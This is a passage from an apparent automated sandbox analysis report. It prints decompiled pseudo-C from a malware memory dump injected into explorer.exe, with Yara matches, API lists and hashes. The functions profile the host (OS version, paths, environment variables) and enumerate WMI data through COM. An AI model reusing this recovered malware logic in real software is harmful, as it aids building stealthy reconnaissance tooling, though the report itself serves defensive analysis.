                                          				void* _t17;
                                          
                                          				_t15 = 2;
                                          				_t5 = E000CA5F7(_a4, _t15);
                                          				_t17 = _t5;
                                          				if(_t17 != 0) {
                                          					_t6 = E000CA65C(_t17, _a8, _a12); // executed
                                          					if(_t6 != 0) {
                                          						CloseHandle(_t17);
                                          						return 0;
                                          					}
                                          					_t10 = 0xfffffffe;
                                          					return _t10;
                                          				}
                                          				return _t5 | 0xffffffff;
                                          			}









                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
                                          • Instruction ID: 530dcad075266c1156e77377669d94ddcef453a396c3f42a45d0ff379d1e2d4c
                                          • Opcode Fuzzy Hash: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
                                          • Instruction Fuzzy Hash: 55E09B3530861D6B8B2157A8AC50E9E3765AF4A77C7114716FD258F2D1CA30D84042D2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000C98A6(void* __eflags, intOrPtr _a4) {
                                          				intOrPtr _t24;
                                          
                                          				_t24 = _a4;
                                          				if(E000CA4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
                                          					CloseHandle( *(_t24 + 0x1c));
                                          					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
                                          					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
                                          						E000C984A(_t24, 1);
                                          					}
                                          					return  *((intOrPtr*)(_t24 + 0x18));
                                          				}
                                          				return 0;
                                          			}





                                          APIs
                                          • CloseHandle.KERNELBASE(?), ref: 000C98CA
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
                                          • Instruction ID: 761c44297c6940bc27b2f576ce9d72b8e9fb3a67907d93a40376c24e364c2c1d
                                          • Opcode Fuzzy Hash: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
                                          • Instruction Fuzzy Hash: E0F0A030300B009BC720AF22E848E5BBBE9EF56350700882DE986879A2DB35F8099790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E000CB337(void* __ecx) {
                                          				intOrPtr _t4;
                                          				void* _t5;
                                          				intOrPtr _t6;
                                          				void* _t12;
                                          				void* _t13;
                                          
                                          				_t4 =  *0xde684; // 0x14cf8f0
                                          				_t13 = 0;
                                          				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
                                          				_t12 = _t5;
                                          				if(_t12 != 0) {
                                          					_t6 =  *0xde684; // 0x14cf8f0
                                          					_push(_t12);
                                          					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
                                          						_t13 = 1;
                                          					}
                                          					CloseHandle(_t12);
                                          					return _t13;
                                          				}
                                          				return _t5;
                                          			}









                                          APIs
                                          • CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
                                          • Instruction ID: 952f55d8802c1bf5a37f67cca09105c85e7c47fe1d2e413aeb41e2f7cc7b4704
                                          • Opcode Fuzzy Hash: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
                                          • Instruction Fuzzy Hash: B2E04F32301160ABD6606B69EC8CF6B7BA9FB99A91F06016DF905CB151CB24C802C7B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 86%
                                          			E000CD01F(void* __fp0) {
                                          				char _v8;
                                          				char _v12;
                                          				char _v16;
                                          				struct _SYSTEM_INFO _v52;
                                          				char _v180;
                                          				char _v692;
                                          				char _v704;
                                          				char _v2680;
                                          				void* __esi;
                                          				struct _OSVERSIONINFOA* _t81;
                                          				intOrPtr _t83;
                                          				void* _t84;
                                          				long _t86;
                                          				intOrPtr* _t88;
                                          				intOrPtr _t90;
                                          				intOrPtr _t95;
                                          				intOrPtr _t97;
                                          				void* _t98;
                                          				intOrPtr _t103;
                                          				char* _t105;
                                          				void* _t108;
                                          				char _t115;
                                          				signed int _t117;
                                          				char _t119;
                                          				intOrPtr _t124;
                                          				intOrPtr _t127;
                                          				intOrPtr _t130;
                                          				intOrPtr _t134;
                                          				intOrPtr _t147;
                                          				intOrPtr _t149;
                                          				intOrPtr _t152;
                                          				intOrPtr _t154;
                                          				signed int _t159;
                                          				struct HINSTANCE__* _t162;
                                          				short* _t164;
                                          				intOrPtr _t167;
                                          				WCHAR* _t168;
                                          				char* _t169;
                                          				intOrPtr _t181;
                                          				intOrPtr _t200;
                                          				void* _t215;
                                          				char _t218;
                                          				void* _t219;
                                          				char* _t220;
                                          				struct _OSVERSIONINFOA* _t222;
                                          				void* _t223;
                                          				int* _t224;
                                          				void* _t241;
                                          
                                          				_t241 = __fp0;
                                          				_t162 =  *0xde69c; // 0x10000000
                                          				_t81 = E000C8604(0x1ac4);
                                          				_t222 = _t81;
                                          				if(_t222 == 0) {
                                          					return _t81;
                                          				}
                                          				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                                          				_t83 =  *0xde684; // 0x14cf8f0
                                          				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                                          				_t3 = _t222 + 0x648; // 0x648
                                          				E000D2301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                                          				_t5 = _t222 + 0x1644; // 0x1644
                                          				_t216 = _t5;
                                          				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                                          				_t227 = _t86;
                                          				if(_t86 != 0) {
                                          					 *((intOrPtr*)(_t222 + 0x1854)) = E000C8FBE(_t216, _t227);
                                          				}
                                          				GetCurrentProcess();
                                          				_t88 = E000CBA05();
                                          				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
                                          				_t178 =  *_t88;
                                          				if(E000CBB8D( *_t88) == 0) {
                                          					_t90 = E000CBA62(_t178, _t222);
                                          					__eflags = _t90;
                                          					_t181 = (0 | _t90 > 0x00000000) + 1;
                                          					__eflags = _t181;
                                          					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                                          				} else {
                                          					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                                          				}
                                          				_t12 = _t222 + 0x220; // 0x220
                                          				 *((intOrPtr*)(_t222 + 0x218)) = E000CE3F1(_t12);
                                          				 *((intOrPtr*)(_t222 + 0x21c)) = E000CE3B6(_t12);
                                          				_push( &_v16);
                                          				 *(_t222 + 0x224) = _t162;
                                          				_push( &_v8);
                                          				_v12 = 0x80;
                                          				_push( &_v692);
                                          				_v8 = 0x100;
                                          				_push( &_v12);
                                          				_t22 = _t222 + 0x114; // 0x114
                                          				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
                                          				_t95 =  *0xde68c; // 0x14cfab8
                                          				_push(0);
                                          				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
                                          					GetLastError();
                                          				}
                                          				_t97 =  *0xde694; // 0x14cfa48
                                          				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                                          				_t26 = _t222 + 0x228; // 0x228
                                          				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                                          				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                                          				GetLastError();
                                          				_t31 = _t222 + 0x228; // 0x228
                                          				 *((intOrPtr*)(_t222 + 0x434)) = E000C8FBE(_t31, _t98);
                                          				_t34 = _t222 + 0x114; // 0x114
                                          				_t103 = E000CB7A8(_t34,  &_v692);
                                          				_t35 = _t222 + 0xb0; // 0xb0
                                          				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                                          				_push(_t35);
                                          				E000CB67D(_t103, _t35, _t98, _t241);
                                          				_t37 = _t222 + 0xb0; // 0xb0
                                          				_t105 = _t37;
                                          				_t38 = _t222 + 0xd0; // 0xd0
                                          				_t164 = _t38;
                                          				if(_t105 != 0) {
                                          					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                                          					if(_t159 > 0) {
                                          						_t164[_t159] = 0;
                                          					}
                                          				}
                                          				_t41 = _t222 + 0x438; // 0x438
                                          				_t42 = _t222 + 0x228; // 0x228
                                          				E000C8FD8(_t42, _t41);
                                          				_t43 = _t222 + 0xb0; // 0xb0
                                          				_t108 = E000CD400(_t43, E000CC379(_t43), 0);
                                          				_t44 = _t222 + 0x100c; // 0x100c
                                          				E000CB88A(_t108, _t44, _t241);
                                          				_t199 = GetCurrentProcess();
                                          				 *((intOrPtr*)(_t222 + 0x101c)) = E000CBBDF(_t110);
                                          				memset(_t222, 0, 0x9c);
                                          				_t224 = _t223 + 0xc;
                                          				_t222->dwOSVersionInfoSize = 0x9c;
                                          				GetVersionExA(_t222);
                                          				_t167 =  *0xde684; // 0x14cf8f0
                                          				_t115 = 0;
                                          				_v8 = 0;
                                          				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                                          					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                                          					_t115 = _v8;
                                          				}
                                          				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                                          				if(_t115 == 0) {
                                          					GetSystemInfo( &_v52);
                                          					_t117 = _v52.dwOemId & 0x0000ffff;
                                          				} else {
                                          					_t117 = 9;
                                          				}
                                          				_t54 = _t222 + 0x1020; // 0x1020
                                          				_t168 = _t54;
                                          				 *(_t222 + 0x9c) = _t117;
                                          				GetWindowsDirectoryW(_t168, 0x104);
                                          				_t119 = E000C95E1(_t199, 0x10c);
                                          				_t200 =  *0xde684; // 0x14cf8f0
                                          				_t218 = _t119;
                                          				 *_t224 = 0x104;
                                          				_push( &_v704);
                                          				_push(_t218);
                                          				_v8 = _t218;
                                          				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                                          					_t154 =  *0xde684; // 0x14cf8f0
                                          					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                                          				}
                                          				E000C85D5( &_v8);
                                          				_t124 =  *0xde684; // 0x14cf8f0
                                          				_t61 = _t222 + 0x1434; // 0x1434
                                          				_t219 = _t61;
                                          				 *_t224 = 0x209;
                                          				_push(_t219);
                                          				_push(L"USERPROFILE");
                                          				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                                          					E000C9640(_t219, 0x105, L"%s\\%s", _t168);
                                          					_t152 =  *0xde684; // 0x14cf8f0
                                          					_t224 =  &(_t224[5]);
                                          					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                                          				}
                                          				_push(0x20a);
                                          				_t64 = _t222 + 0x122a; // 0x122a
                                          				_t169 = L"TEMP";
                                          				_t127 =  *0xde684; // 0x14cf8f0
                                          				_push(_t169);
                                          				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                                          					_t149 =  *0xde684; // 0x14cf8f0
                                          					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                                          				}
                                          				_push(0x40);
                                          				_t220 = L"SystemDrive";
                                          				_push( &_v180);
                                          				_t130 =  *0xde684; // 0x14cf8f0
                                          				_push(_t220);
                                          				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                                          					_t147 =  *0xde684; // 0x14cf8f0
                                          					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                                          				}
                                          				_v8 = 0x7f;
                                          				_t72 = _t222 + 0x199c; // 0x199c
                                          				_t134 =  *0xde684; // 0x14cf8f0
                                          				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                                          				_t75 = _t222 + 0x100c; // 0x100c
                                          				E000D2301(E000CD400(_t75, E000CC379(_t75), 0),  &_v2680);
                                          				_t76 = _t222 + 0x1858; // 0x1858
                                          				E000D22D3( &_v2680, _t76, 0x20);
                                          				_t79 = _t222 + 0x1878; // 0x1878
                                          				E000C902D(1, _t79, 0x14, 0x1e,  &_v2680);
                                          				 *((intOrPtr*)(_t222 + 0x1898)) = E000CCD33(_t79);
                                          				return _t222;
                                          			}




















































                                          APIs
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          • GetCurrentProcessId.KERNEL32 ref: 000CD046
                                          • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 000CD082
                                          • GetCurrentProcess.KERNEL32 ref: 000CD09F
                                          • GetLastError.KERNEL32 ref: 000CD13E
                                          • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 000CD16C
                                          • GetLastError.KERNEL32 ref: 000CD172
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 000CD1C7
                                          • GetCurrentProcess.KERNEL32 ref: 000CD20E
                                          • memset.MSVCRT ref: 000CD229
                                          • GetVersionExA.KERNEL32(00000000), ref: 000CD234
                                          • GetCurrentProcess.KERNEL32(00000100), ref: 000CD24E
                                          • GetSystemInfo.KERNEL32(?), ref: 000CD26A
                                          • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 000CD287
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                                          • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                          • API String ID: 3876402152-2706916422
                                          • Opcode ID: 549c9301d8567921ee0cf5015c250f550866b6553047009fadf10b9400dac970
                                          • Instruction ID: bb5fc8c38e6f26cdcc8b067c3c65418d8cefabbea5c8d39083ed8debe4d40b99
                                          • Opcode Fuzzy Hash: 549c9301d8567921ee0cf5015c250f550866b6553047009fadf10b9400dac970
                                          • Instruction Fuzzy Hash: A1B14C71600744ABE710EB74DD89FEE77E8EF58340F00446EF95AD7292EB74AA448B21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E000CDB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				void* _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				char _v48;
                                          				char _v52;
                                          				intOrPtr _v56;
                                          				signed int _v60;
                                          				char* _v72;
                                          				signed short _v80;
                                          				signed int _v84;
                                          				char _v88;
                                          				char _v92;
                                          				char _v96;
                                          				intOrPtr _v100;
                                          				char _v104;
                                          				char _v616;
                                          				intOrPtr* _t159;
                                          				char _t165;
                                          				signed int _t166;
                                          				signed int _t173;
                                          				signed int _t178;
                                          				signed int _t186;
                                          				intOrPtr* _t187;
                                          				signed int _t188;
                                          				signed int _t192;
                                          				intOrPtr* _t193;
                                          				intOrPtr _t200;
                                          				intOrPtr* _t205;
                                          				signed int _t207;
                                          				signed int _t209;
                                          				intOrPtr* _t210;
                                          				intOrPtr _t212;
                                          				intOrPtr* _t213;
                                          				signed int _t214;
                                          				char _t217;
                                          				signed int _t218;
                                          				signed int _t219;
                                          				signed int _t230;
                                          				signed int _t235;
                                          				signed int _t242;
                                          				signed int _t243;
                                          				signed int _t244;
                                          				signed int _t245;
                                          				intOrPtr* _t247;
                                          				intOrPtr* _t251;
                                          				signed int _t252;
                                          				intOrPtr* _t253;
                                          				void* _t255;
                                          				intOrPtr* _t261;
                                          				signed int _t262;
                                          				signed int _t283;
                                          				signed int _t289;
                                          				char* _t298;
                                          				void* _t320;
                                          				signed int _t322;
                                          				intOrPtr* _t323;
                                          				intOrPtr _t324;
                                          				signed int _t327;
                                          				intOrPtr* _t328;
                                          				intOrPtr* _t329;
                                          
                                          				_v32 = _v32 & 0x00000000;
                                          				_v60 = _v60 & 0x00000000;
                                          				_v56 = __edx;
                                          				_v100 = __ecx;
                                          				_t159 = E000CD523(__ecx);
                                          				_t251 = _t159;
                                          				_v104 = _t251;
                                          				if(_t251 == 0) {
                                          					return _t159;
                                          				}
                                          				_t320 = E000C8604(0x10);
                                          				_v36 = _t320;
                                          				_pop(_t255);
                                          				if(_t320 == 0) {
                                          					L53:
                                          					E000C861A( &_v60, 0xfffffffe);
                                          					E000CD5D7( &_v104);
                                          					return _t320;
                                          				}
                                          				_t165 = E000C95E1(_t255, 0x536);
                                          				 *_t328 = 0x609;
                                          				_v52 = _t165;
                                          				_t166 = E000C95E1(_t255);
                                          				_push(0);
                                          				_push(_v56);
                                          				_v20 = _t166;
                                          				_push(_t166);
                                          				_push(_a4);
                                          				_t322 = E000C92E5(_t165);
                                          				_v60 = _t322;
                                          				E000C85D5( &_v52);
                                          				E000C85D5( &_v20);
                                          				_t329 = _t328 + 0x20;
                                          				if(_t322 != 0) {
                                          					_t323 = __imp__#2;
                                          					_v40 =  *_t323(_t322);
                                          					_t173 = E000C95E1(_t255, 0x9e4);
                                          					_v20 = _t173;
                                          					_v52 =  *_t323(_t173);
                                          					E000C85D5( &_v20);
                                          					_t324 = _v40;
                                          					_t261 =  *_t251;
                                          					_t252 = 0;
                                          					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                          					__eflags = _t178;
                                          					if(_t178 != 0) {
                                          						L52:
                                          						__imp__#6(_t324);
                                          						__imp__#6(_v52);
                                          						goto L53;
                                          					}
                                          					_t262 = _v32;
                                          					_v28 = 0;
                                          					_v20 = 0;
                                          					__eflags = _t262;
                                          					if(_t262 == 0) {
                                          						L49:
                                          						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                          						__eflags = _t252;
                                          						if(_t252 == 0) {
                                          							E000C861A( &_v36, 0);
                                          							_t320 = _v36;
                                          						} else {
                                          							 *(_t320 + 8) = _t252;
                                          							 *_t320 = E000C91E3(_v100);
                                          							 *((intOrPtr*)(_t320 + 4)) = E000C91E3(_v56);
                                          						}
                                          						goto L52;
                                          					} else {
                                          						goto L6;
                                          					}
                                          					while(1) {
                                          						L6:
                                          						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                          						__eflags = _t186;
                                          						if(_t186 != 0) {
                                          							break;
                                          						}
                                          						_v16 = 0;
                                          						_v48 = 0;
                                          						_v12 = 0;
                                          						_v24 = 0;
                                          						__eflags = _v84;
                                          						if(_v84 == 0) {
                                          							break;
                                          						}
                                          						_t187 = _v28;
                                          						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                          						__eflags = _t188;
                                          						if(_t188 >= 0) {
                                          							__imp__#20(_v24, 1,  &_v16);
                                          							__imp__#19(_v24, 1,  &_v48);
                                          							_t46 = _t320 + 0xc; // 0xc
                                          							_t253 = _t46;
                                          							_t327 = _t252 << 3;
                                          							_t47 = _t327 + 8; // 0x8
                                          							_t192 = E000C8698(_t327, _t47);
                                          							__eflags = _t192;
                                          							if(_t192 == 0) {
                                          								__imp__#16(_v24);
                                          								_t193 = _v28;
                                          								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                          								L46:
                                          								_t252 = _v20;
                                          								break;
                                          							}
                                          							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                          							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E000C8604( *(_t327 +  *_t253) << 3);
                                          							_t200 =  *_t253;
                                          							__eflags =  *(_t327 + _t200 + 4);
                                          							if( *(_t327 + _t200 + 4) == 0) {
                                          								_t136 = _t320 + 0xc; // 0xc
                                          								E000C861A(_t136, 0);
                                          								E000C861A( &_v36, 0);
                                          								__imp__#16(_v24);
                                          								_t205 = _v28;
                                          								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                          								_t320 = _v36;
                                          								goto L46;
                                          							}
                                          							_t207 = _v16;
                                          							while(1) {
                                          								_v12 = _t207;
                                          								__eflags = _t207 - _v48;
                                          								if(_t207 > _v48) {
                                          									break;
                                          								}
                                          								_v44 = _v44 & 0x00000000;
                                          								_t209 =  &_v12;
                                          								__imp__#25(_v24, _t209,  &_v44);
                                          								__eflags = _t209;
                                          								if(_t209 < 0) {
                                          									break;
                                          								}
                                          								_t212 = E000C91E3(_v44);
                                          								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                          								_t213 = _v28;
                                          								_t281 =  *_t213;
                                          								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                          								__eflags = _t214;
                                          								if(_t214 < 0) {
                                          									L39:
                                          									__imp__#6(_v44);
                                          									_t207 = _v12 + 1;
                                          									__eflags = _t207;
                                          									continue;
                                          								}
                                          								_v92 = E000C95E1(_t281, 0x250);
                                          								 *_t329 = 0x4cc;
                                          								_t217 = E000C95E1(_t281);
                                          								_t283 = _v80;
                                          								_v96 = _t217;
                                          								_t218 = _t283 & 0x0000ffff;
                                          								__eflags = _t218 - 0xb;
                                          								if(__eflags > 0) {
                                          									_t219 = _t218 - 0x10;
                                          									__eflags = _t219;
                                          									if(_t219 == 0) {
                                          										L35:
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
                                          										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                          										__eflags = _t289;
                                          										if(_t289 == 0) {
                                          											L38:
                                          											E000C85D5( &_v92);
                                          											E000C85D5( &_v96);
                                          											__imp__#9( &_v80);
                                          											goto L39;
                                          										}
                                          										_push(_v72);
                                          										_push(L"%d");
                                          										L37:
                                          										_push(0xc);
                                          										_push(_t289);
                                          										E000C9640();
                                          										_t329 = _t329 + 0x10;
                                          										goto L38;
                                          									}
                                          									_t230 = _t219 - 1;
                                          									__eflags = _t230;
                                          									if(_t230 == 0) {
                                          										L33:
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
                                          										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                          										__eflags = _t289;
                                          										if(_t289 == 0) {
                                          											goto L38;
                                          										}
                                          										_push(_v72);
                                          										_push(L"%u");
                                          										goto L37;
                                          									}
                                          									_t235 = _t230 - 1;
                                          									__eflags = _t235;
                                          									if(_t235 == 0) {
                                          										goto L33;
                                          									}
                                          									__eflags = _t235 == 1;
                                          									if(_t235 == 1) {
                                          										goto L33;
                                          									}
                                          									L28:
                                          									__eflags = _t283 & 0x00002000;
                                          									if((_t283 & 0x00002000) == 0) {
                                          										_v88 = E000C95E1(_t283, 0x219);
                                          										E000C9640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                          										E000C85D5( &_v88);
                                          										_t329 = _t329 + 0x18;
                                          										_t298 =  &_v616;
                                          										L31:
                                          										_t242 = E000C91E3(_t298);
                                          										L32:
                                          										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                          										goto L38;
                                          									}
                                          									_t242 = E000CDA20( &_v80);
                                          									goto L32;
                                          								}
                                          								if(__eflags == 0) {
                                          									__eflags = _v72 - 0xffff;
                                          									_t298 = L"TRUE";
                                          									if(_v72 != 0xffff) {
                                          										_t298 = L"FALSE";
                                          									}
                                          									goto L31;
                                          								}
                                          								_t243 = _t218 - 1;
                                          								__eflags = _t243;
                                          								if(_t243 == 0) {
                                          									goto L38;
                                          								}
                                          								_t244 = _t243 - 1;
                                          								__eflags = _t244;
                                          								if(_t244 == 0) {
                                          									goto L35;
                                          								}
                                          								_t245 = _t244 - 1;
                                          								__eflags = _t245;
                                          								if(_t245 == 0) {
                                          									goto L35;
                                          								}
                                          								__eflags = _t245 != 5;
                                          								if(_t245 != 5) {
                                          									goto L28;
                                          								}
                                          								_t298 = _v72;
                                          								goto L31;
                                          							}
                                          							__imp__#16(_v24);
                                          							_t210 = _v28;
                                          							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                          							_t252 = _v20;
                                          							L42:
                                          							_t262 = _v32;
                                          							_t252 = _t252 + 1;
                                          							_v20 = _t252;
                                          							__eflags = _t262;
                                          							if(_t262 != 0) {
                                          								continue;
                                          							}
                                          							L48:
                                          							_t324 = _v40;
                                          							goto L49;
                                          						}
                                          						_t247 = _v28;
                                          						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                          						goto L42;
                                          					}
                                          					_t262 = _v32;
                                          					goto L48;
                                          				} else {
                                          					E000C861A( &_v36, _t322);
                                          					_t320 = _v36;
                                          					goto L53;
                                          				}
                                          			}
                                          0x000cdd45
                                          0x000cdd48
                                          0x000cdd4b
                                          0x000cdd4d
                                          0x000cdec3
                                          0x000cdec6
                                          0x000cdecf
                                          0x000cdecf
                                          0x00000000
                                          0x000cdecf
                                          0x000cdd5d
                                          0x000cdd60
                                          0x000cdd67
                                          0x000cdd6d
                                          0x000cdd70
                                          0x000cdd73
                                          0x000cdd76
                                          0x000cdd79
                                          0x000cddb5
                                          0x000cddb5
                                          0x000cddb8
                                          0x000cde64
                                          0x000cde78
                                          0x000cde88
                                          0x000cde8c
                                          0x000cde8e
                                          0x000cdea5
                                          0x000cdea9
                                          0x000cdeb2
                                          0x000cdebd
                                          0x00000000
                                          0x000cdebd
                                          0x000cde94
                                          0x000cde95
                                          0x000cde9a
                                          0x000cde9a
                                          0x000cde9c
                                          0x000cde9d
                                          0x000cdea2
                                          0x00000000
                                          0x000cdea2
                                          0x000cddbe
                                          0x000cddbe
                                          0x000cddc1
                                          0x000cde2c
                                          0x000cde40
                                          0x000cde50
                                          0x000cde54
                                          0x000cde56
                                          0x00000000
                                          0x00000000
                                          0x000cde5c
                                          0x000cde5d
                                          0x00000000
                                          0x000cde5d
                                          0x000cddc3
                                          0x000cddc3
                                          0x000cddc6
                                          0x00000000
                                          0x00000000
                                          0x000cddc8
                                          0x000cddcb
                                          0x00000000
                                          0x00000000
                                          0x000cddcd
                                          0x000cddcd
                                          0x000cddd3
                                          0x000cddef
                                          0x000cddfe
                                          0x000cde07
                                          0x000cde0c
                                          0x000cde0f
                                          0x000cde15
                                          0x000cde15
                                          0x000cde1a
                                          0x000cde26
                                          0x00000000
                                          0x000cde26
                                          0x000cddd8
                                          0x00000000
                                          0x000cddd8
                                          0x000cdd7b
                                          0x000cdda2
                                          0x000cdda7
                                          0x000cddac
                                          0x000cddae
                                          0x000cddae
                                          0x00000000
                                          0x000cddac
                                          0x000cdd7d
                                          0x000cdd7d
                                          0x000cdd80
                                          0x00000000
                                          0x00000000
                                          0x000cdd86
                                          0x000cdd86
                                          0x000cdd89
                                          0x00000000
                                          0x00000000
                                          0x000cdd8f
                                          0x000cdd8f
                                          0x000cdd92
                                          0x00000000
                                          0x00000000
                                          0x000cdd98
                                          0x000cdd9b
                                          0x00000000
                                          0x00000000
                                          0x000cdd9d
                                          0x00000000
                                          0x000cdd9d
                                          0x000cdedf
                                          0x000cdee5
                                          0x000cdeeb
                                          0x000cdeee
                                          0x000cdef1
                                          0x000cdef1
                                          0x000cdef4
                                          0x000cdef5
                                          0x000cdef8
                                          0x000cdefa
                                          0x00000000
                                          0x00000000
                                          0x000cdf4a
                                          0x000cdf4a
                                          0x00000000
                                          0x000cdf4a
                                          0x000cdc81
                                          0x000cdc87
                                          0x00000000
                                          0x000cdc87
                                          0x000cdf47
                                          0x00000000
                                          0x000cdbca
                                          0x000cdbcf
                                          0x000cdbd4
                                          0x00000000
                                          0x000cdbd8

                                          APIs
                                            • Part of subcall function 000CD523: CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
                                            • Part of subcall function 000CD523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
                                            • Part of subcall function 000CD523: CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
                                            • Part of subcall function 000CD523: SysAllocString.OLEAUT32(00000000), ref: 000CD569
                                            • Part of subcall function 000CD523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
